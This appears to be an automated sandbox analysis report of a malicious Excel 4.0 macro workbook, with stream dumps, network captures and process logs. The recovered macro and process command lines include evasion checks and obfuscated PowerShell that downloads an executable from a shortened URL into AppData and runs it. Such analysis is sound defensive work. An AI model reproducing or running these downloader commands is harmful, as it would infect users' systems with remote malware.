                                                  Stream Path:\x5DocumentSummaryInformation
                                                  File Type:data
                                                  Stream Size:296
                                                  Entropy:3.12351939639
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . .
                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 224
                                                  General
                                                  Stream Path:\x5SummaryInformation
                                                  File Type:data
                                                  Stream Size:224
                                                  Entropy:3.82752718687
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . A d m i n i s t r a t o r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . W . . . . . . . . . . . .
                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 61163
                                                  General
                                                  Stream Path:Workbook
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:61163
                                                  Entropy:7.20561555755
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . U s e r n i s t r a t o r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . B T . . 8 . . . . . . . X
                                                  Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 55 73 65 72 6e 69 73 74 72 61 74 6f 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 533
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Stream Size:533
                                                  Entropy:5.2193098334
                                                  Base64 Encoded:True
                                                  Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F e u i l 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D E D C 7 2 1 D 9 2 2 7 2 3 2 B 2 3 2 B 2 7 2 F 2 7 2 F " . . D P B = " 7 3 7 1 D F 8 8
                                                  Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 65 75 69 6c 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 48 65 6c 70 46
                                                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                  File Type:data
                                                  Stream Size:86
                                                  Entropy:3.21559847503
                                                  Base64 Encoded:False
                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F e u i l 1 . F . e . u . i . l . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 65 75 69 6c 31 00 46 00 65 00 75 00 69 00 6c 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2607
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                  File Type:data
                                                  Stream Size:2607
                                                  Entropy:4.00233365281
                                                  Base64 Encoded:False
                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                  Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1136
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                  File Type:data
                                                  Stream Size:1136
                                                  Entropy:4.08521227715
                                                  Base64 Encoded:False
                                                  Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . 2 . . . K . ` . A e ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:93 4b 2a a3 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 02 00 00 7e 6f 00 00 7f 00 00 00 00 15 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 74
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                  File Type:data
                                                  Stream Size:74
                                                  Entropy:1.7969826379
                                                  Base64 Encoded:False
                                                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . .
                                                  Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 09 00 00 00 00 00 03 00 74 00 00 7f 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 84
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                  File Type:data
                                                  Stream Size:84
                                                  Entropy:1.91120509258
                                                  Base64 Encoded:False
                                                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . . . . . .
                                                  Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 04 00 00 12 00 00 6b 00 00 7f 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 103
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                  File Type:data
                                                  Stream Size:103
                                                  Entropy:1.89141813866
                                                  Base64 Encoded:False
                                                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . .
                                                  Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 568
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                  File Type:data
                                                  Stream Size:568
                                                  Entropy:6.35089764744
                                                  Base64 Encoded:True
                                                  Data ASCII:. 4 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                  Data Raw:01 34 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e8 8b 95 61 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                  Macro 4.0 Code

                                                  =ERROR(FALSE; (B100))
                                                  =IF(GET.WORKSPACE(19);;CLOSE(TRUE))
                                                  =IF(GET.WORKSPACE(42);;CLOSE(TRUE))
                                                  =EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').""Invoke""('"&CHAR(104)&"ttps://cutt.ly/ZhqUH1O','vx.exe')")
                                                  =EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 stARt`-slE`Ep 20; Move-Item ""vx.exe"" -Destination ""${enV`:appdata}""")
                                                  =EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe")
                                                  =PAUSE()

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                  Nov 19, 2020 10:13:22.580190897 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:22.602308989 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:22.602430105 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:22.613116980 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:22.635268927 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:22.638175964 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:22.638245106 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:22.638271093 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:22.638298035 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:22.652420998 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:22.674890041 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:22.674922943 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:22.885773897 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:22.905165911 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:22.905392885 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:23.971853971 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:23.994452000 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:24.110934973 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:24.110964060 CET  443          49167      104.22.1.232   192.168.2.22
                                                  Nov 19, 2020 10:13:24.111212969 CET  49167        443        192.168.2.22   104.22.1.232
                                                  Nov 19, 2020 10:13:24.452984095 CET  49169        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:24.777394056 CET  443          49169      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:24.777488947 CET  49169        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:24.778153896 CET  49169        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.102404118 CET  443          49169      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.102571964 CET  443          49169      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.102615118 CET  443          49169      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.102631092 CET  443          49169      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.102694988 CET  49169        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.103091955 CET  49169        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.118791103 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.119843006 CET  49169        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.432653904 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.432785034 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.433320045 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.444309950 CET  443          49169      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746805906 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746820927 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746830940 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746843100 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746854067 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746864080 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746876955 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746886969 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:25.746953011 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.746982098 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.746984959 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.746988058 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:25.750351906 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:26.063963890 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:26.063986063 CET  443          49170      202.92.6.10    192.168.2.22
                                                  Nov 19, 2020 10:13:26.064173937 CET  49170        443        192.168.2.22   202.92.6.10
                                                  Nov 19, 2020 10:13:26.117590904 CET  49167        443        192.168.2.22   104.22.1.232

                                                  UDP Packets

                                                  Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                  Nov 19, 2020 10:13:22.554903030 CET  52197        53         192.168.2.22   8.8.8.8
                                                  Nov 19, 2020 10:13:22.567907095 CET  53           52197      8.8.8.8        192.168.2.22
                                                  Nov 19, 2020 10:13:23.109313011 CET  53099        53         192.168.2.22   8.8.8.8
                                                  Nov 19, 2020 10:13:23.122746944 CET  53           53099      8.8.8.8        192.168.2.22
                                                  Nov 19, 2020 10:13:23.125921011 CET  52838        53         192.168.2.22   8.8.8.8
                                                  Nov 19, 2020 10:13:23.138626099 CET  53           52838      8.8.8.8        192.168.2.22
                                                  Nov 19, 2020 10:13:24.118302107 CET  61200        53         192.168.2.22   8.8.8.8
                                                  Nov 19, 2020 10:13:24.451885939 CET  53           61200      8.8.8.8        192.168.2.22

                                                  DNS Queries

                                                  Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name               Type            Class
                                                  Nov 19, 2020 10:13:22.554903030 CET  192.168.2.22  8.8.8.8  0x51f2    Standard query (0)  cutt.ly            A (IP address)  IN (0x0001)
                                                  Nov 19, 2020 10:13:24.118302107 CET  192.168.2.22  8.8.8.8  0x541f    Standard query (0)  shopphongtinh.com  A (IP address)  IN (0x0001)

                                                  DNS Answers

                                                  Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name               CName  Address       Type            Class
                                                  Nov 19, 2020 10:13:22.567907095 CET  8.8.8.8    192.168.2.22  0x51f2    No error (0)  cutt.ly                   104.22.1.232  A (IP address)  IN (0x0001)
                                                  Nov 19, 2020 10:13:22.567907095 CET  8.8.8.8    192.168.2.22  0x51f2    No error (0)  cutt.ly                   172.67.8.238  A (IP address)  IN (0x0001)
                                                  Nov 19, 2020 10:13:22.567907095 CET  8.8.8.8    192.168.2.22  0x51f2    No error (0)  cutt.ly                   104.22.0.232  A (IP address)  IN (0x0001)
                                                  Nov 19, 2020 10:13:24.451885939 CET  8.8.8.8    192.168.2.22  0x541f    No error (0)  shopphongtinh.com         202.92.6.10   A (IP address)  IN (0x0001)

                                                  HTTPS Packets

                                                  Timestamp: Nov 19, 2020 10:13:22.638271093 CET
                                                  Source IP: 104.22.1.232    Source Port: 443    Dest IP: 192.168.2.22    Dest Port: 49167
                                                  Certificate 1 (leaf)
                                                  Subject: CN=www.cutt.ly
                                                  Issuer: CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                  Not Before: Sat Feb 08 01:00:00 CET 2020
                                                  Not After: Thu Apr 08 14:00:00 CEST 2021
                                                  Certificate 2 (chain)
                                                  Subject: CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                  Issuer: CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                  Not Before: Thu Nov 02 13:24:33 CET 2017
                                                  Not After: Tue Nov 02 13:24:33 CET 2027
                                                  JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
                                                  JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d

                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Memory Usage

                                                  High Level Behavior Distribution

                                                  Behavior

                                                  System Behavior

                                                  General

                                                  Start time:10:12:45
                                                  Start date:19/11/2020
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                  Imagebase:0x13f200000
                                                  File size:27641504 bytes
                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:10:12:48
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                  Imagebase:0x4abb0000
                                                  File size:345088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:12:48
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                  Imagebase:0x4abb0000
                                                  File size:345088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:12:48
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                  Imagebase:0x4abb0000
                                                  File size:345088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  General

                                                  Start time:10:12:49
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                  Imagebase:0x13ffd0000
                                                  File size:473600 bytes
                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:10:12:49
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                  Imagebase:0x13ffd0000
                                                  File size:473600 bytes
                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  General

                                                  Start time:10:12:49
                                                  Start date:19/11/2020
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                  Imagebase:0x13ffd0000
                                                  File size:473600 bytes
                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                    Executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2128634758.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ceba9b6edcc438566a05a68a3a02790a318ffd95159558b52af58a1fda2a05b5
                                                    • Instruction ID: f532b43262ff8362122cd3b09f73af07057f62f358d9147ab4eb8429af243f28
                                                    • Opcode Fuzzy Hash: ceba9b6edcc438566a05a68a3a02790a318ffd95159558b52af58a1fda2a05b5
                                                    • Instruction Fuzzy Hash: A541802160EBC64FE75357785C666A17FF0EF17210B0A00E7D488CB1A3D9589D49C7A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2128634758.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • Opcode ID: e81eb42b443b10cbefe86567e8b723da30cfb748908022496fadc7013d006679
                                                    • Instruction ID: d6f7856ca93e2f5d3a9cbdbb2ef4523e3416e91518583626c850cffdcba0bf65
                                                    • Opcode Fuzzy Hash: e81eb42b443b10cbefe86567e8b723da30cfb748908022496fadc7013d006679
                                                    • Instruction Fuzzy Hash: A611996144E3D14FE7039778AC612907FB0AF57214F4A01C7E884CF1A3E2591AA9C763
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2161573534.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • Opcode ID: 5c70ccfce2ccb623d20ac8216a17e55640227a7170db1f2de395e25dc7895a76
                                                    • Instruction ID: 932a6ee767d33043eb11abe1fd3eb6e999518e54c4a714d37b974705f09d03b0
                                                    • Opcode Fuzzy Hash: 5c70ccfce2ccb623d20ac8216a17e55640227a7170db1f2de395e25dc7895a76
                                                    • Instruction Fuzzy Hash: A001EE6144E7D14FD3434B386C252A17FB0AF93210F4A42DBD4C4CE0E3D2580A59C363
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2161573534.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • Opcode ID: 801e7a08b555dbd0b1ba81769a7710ddbbe5c496eece90dafe89e45686d75ded
                                                    • Instruction ID: e4062db28773ad654a5143d98dcf06bf502d16a2909d64be704312a65a80ae98
                                                    • Opcode Fuzzy Hash: 801e7a08b555dbd0b1ba81769a7710ddbbe5c496eece90dafe89e45686d75ded
                                                    • Instruction Fuzzy Hash: 17011E5294EBD54FD30393341D6A6A13FB26E17124B5F05DBD084CF4A3E28D0A8AC3A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2172644873.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                                    Similarity
                                                    • Opcode ID: 4ad9bbfcc65e159029eeeb3f9d950042e9be54db5e598106e8b478fd1fcd2503
                                                    • Instruction ID: d7b4d435215ae5477e753dd0ab3c83bda4210206781918c70a8c0af677e3feda
                                                    • Opcode Fuzzy Hash: 4ad9bbfcc65e159029eeeb3f9d950042e9be54db5e598106e8b478fd1fcd2503
                                                    • Instruction Fuzzy Hash: 9101EE6184E7C14FE34347785C292A03FB0AF57144B0E02DBD4C8CE0B3E55C0AAAC362
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions